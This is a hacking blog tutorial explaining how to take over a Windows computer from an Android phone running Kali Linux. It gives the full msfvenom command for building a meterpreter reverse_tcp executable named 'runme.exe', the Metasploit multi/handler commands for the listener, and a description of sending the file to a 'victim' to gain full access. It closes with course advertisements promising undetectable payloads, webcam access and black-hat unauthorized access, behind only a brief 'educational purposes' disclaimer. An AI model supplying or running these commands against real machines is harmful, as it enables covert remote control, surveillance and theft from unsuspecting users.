Learn how to hack windows machine with android device in this hacking with mobile series.
How many of you think that hacking a windows machine is difficult for hackers? Well, it turns out that a hacker can hack any windows machine by just using his android device! Crazy right?
Hi everyone, Welcome to the “hacking with mobile” series where we learn that how we can use our smartphone for cybersecurity. In this article, We will see that how someone can gain full access of your windows machine with our smartphone. Before we dive deep into the article, if you don’t know that how to install kali linux on android device then check out this article here and then continue with this article.
Annonucement: If you want to learn how hackers hack millions of accounts on a website, Then check out this beginner friendly course which will teach you how to perform account takeovers in real world websites that will boost your bug bounty hunting skills from basics to advance level.
HACKING WITH MOBILE: REVERSE TCP CONNECTION
We are going to create two files i.e payload and a listener:
Payload: It is the file that we will send to the victim
Listener: It is the file that will listen for incoming connection requested by the payload.
We will be using reverse tcp connection to establish a reliable communication between the attacker’s machine and victim’s machine. Generally, In reverse tcp connection the attacker listen for the connection by opening a port on his/her computer and the payload is supposed to connect back to the listener. Hence, the communication gets established. If you want to read about it in more depth then please check out “Windows Hacking in 5 Minutes“.
Now, let’s create our payload and listener.
Open Kali Linux in your android device and follow the steps below:
1. Type sudo apt install metasploit-framework -y
2. Type ifconfig to find your local IP address.
3. Now type the command below
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_local_ip> LPORT=<your_local_port> -f exe -o runme.exe
Let us try to understand the command with more depth:
-p: Specify the payload flag
windows/x64/meterpreter/reverse_tcp: We are specifying that we will using windows x64 reverse tcp payload that should give us a meterpreter shell once executed. Meterpreter shellls allows us to get complete access of the victim’s machine
LHOST: This will be the ip address where the payload should connect once the victim executes the program
LPORT: This will be the port where the payload should connect once the victim executes the program
-f exe: We are specifying that the file generated should be windows executable since we are testing our payload on windows machine.
-o runme.exe: Finally, we are using -o flag to save our output file as “runme.exe“
4. You will see an output similar to the screenshot below
5. Now that our payload is generated, we need to transfer this file to the victim. You can use multiple ways to do this. In this case i have transferred the file using python on my local machine.
Now, Let’s start our listener.
1. In kali, Type msfconsole
2. After msfconsole gets loaded, you will see a screen similar to this:
3. Type the following commands:
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost <your_local_ip> set lport <your_local_port> exploit
After this, the listener will be started
Once the victim executes the runme.exe, it will give us the full access of the machine
Let’s try to find the details of victim’s machine, On the terminal type sysinfo
As you can see, it has shown us the detail of victim’s machine.
I hope that you have understood how a hacker can hack windows machine from an android device. Please note that this article is only for educational purposes and we strictly prohibit anyone who use this method in illegal way. This method will not work on machines that have antivirus installed in them.
If you want to learn windows hacking in depth then i recommend you to check out this amazing beginner friendly course on “Hacking Windows With Python From Scratch(2022)” in which you will learn:
- Creating Undetectable Payload
- Execute shell commands, download and upload files and access webcam.
- Hack any windows based machine and get full access.
- Bind payload with any files.
- How black hat hackers get unauthorized access to windows machine.
Click here to visit the course.
If you have any doubts or issues then please let me know in the comment section.
Join our telegram channel over here
Subscribe to our YouTube channel over here